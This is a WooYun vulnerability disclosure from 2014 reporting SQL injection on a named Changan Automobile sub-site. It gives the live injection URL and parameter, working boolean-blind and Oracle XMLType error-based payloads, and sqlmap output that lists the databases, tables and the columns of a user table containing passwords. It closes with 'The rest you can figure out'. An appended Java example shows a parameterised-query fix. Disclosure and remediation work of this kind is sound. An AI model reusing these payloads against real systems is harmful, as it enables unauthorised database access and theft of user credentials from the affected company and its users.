Vulnerability summary

Defect ID: wooyun-2014-077100

Title: SQL injection in a sub-site of Chongqing Changan Automobile Co., Ltd.

Related vendor: cncert National Internet Emergency Center

Author: 卡梅隆@广坤

Submitted: 2014-09-23 19:18

Fix time: 2014-11-07 19:20

Published: 2014-11-07 19:20

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-09-23: Vendor being contacted and awaiting vendor acknowledgement; details not public
2014-11-07: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection in a sub-site of Chongqing Changan Automobile Co., Ltd.

Detailed description:

SQL injection in a sub-site of Chongqing Changan Automobile Co., Ltd.

Proof of vulnerability:

Injection point: http://wx.changan.com.cn/miccar_f202/index2.jsp?itemid=7
Place: GET
Parameter: itemid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: itemid=7 AND 1528=1528
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: itemid=7 AND 7147=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(107)||CHR(115)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7147=7147) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL)
web application technology: JSP
back-end DBMS: Oracle
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MINICAR
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WJCACAR
current schema (equivalent to database on Oracle): 'MINICAR'
current user: 'MINICAR'
Database: MINICAR
[19 tables]
+-------------------+
| T_CAR |
| T_CARATT |
| T_CARATTTYPE |
| T_CARIMG |
| T_CONTENT |
| T_DEALER |
| T_GIFT |
| T_ITEM |
| T_MEMBER |
| T_MEMBERCAR |
| T_MEMBER_ARTICLE |
| T_MEMBER_GIFT |
| T_MEMBER_RECOMAND |
| T_MSG |
| T_RESERVE |
| T_RESERVE20101206 |
| T_USERS |
| T_VISITED_DETAIL |
| T_VISITED_NUM |
+-------------------+
Database: MINICAR
Table: T_USERS
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| DEALER | VARCHAR2 |
| FUN | VARCHAR2 |
| PASSW | VARCHAR2 |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
The rest you can figure out.

Fix recommendation:

Filter!
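The "Filter!" recommendation made concrete, as an added example that is not code from the report or from the affected site (whose source is not shown): a hypothetical reconstruction of the itemid lookup with string concatenation, beside a hardened version that validates itemid as an integer and binds it with a PreparedStatement. T_ITEM is a table listed in the report; the column names ITEMID and TITLE are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;

// Hypothetical reconstruction of the itemid lookup behind index2.jsp; the real
// source is not on the page. Column names ITEMID and TITLE are assumptions.
public class ItemLookup {

    // Vulnerable pattern: the raw GET parameter is concatenated into the SQL
    // text, so "7 AND 1528=1528" or the XMLType payload from the sqlmap output
    // are executed by Oracle as part of the WHERE clause.
    static String vulnerableQuery(String itemid) {
        return "SELECT TITLE FROM T_ITEM WHERE ITEMID = " + itemid;
    }

    // Hardened step 1: itemid is a numeric identifier, so reject anything that
    // is not a plain non-negative integer before the database ever sees it.
    static Optional<Long> parseItemId(String raw) {
        if (raw == null || !raw.matches("\\d{1,10}")) {
            return Optional.empty();
        }
        return Optional.of(Long.parseLong(raw));
    }

    // Hardened step 2: a bind variable keeps the value out of the SQL text, so
    // the DBMS never parses user input as statement syntax.
    static String findTitle(Connection conn, String rawItemId) throws SQLException {
        Long itemId = parseItemId(rawItemId)
                .orElseThrow(() -> new IllegalArgumentException("itemid must be an integer"));
        String sql = "SELECT TITLE FROM T_ITEM WHERE ITEMID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setLong(1, itemId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("TITLE") : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: the legitimate value and the report's boolean-based payload.
        System.out.println(vulnerableQuery("7 AND 1528=1528"));  // payload lands inside the SQL text
        System.out.println(parseItemId("7"));                    // accepted
        System.out.println(parseItemId("7 AND 1528=1528"));      // rejected before reaching the DBMS
    }
}
```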

Copyright notice: when reposting, please credit the source 卡梅隆@广坤@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.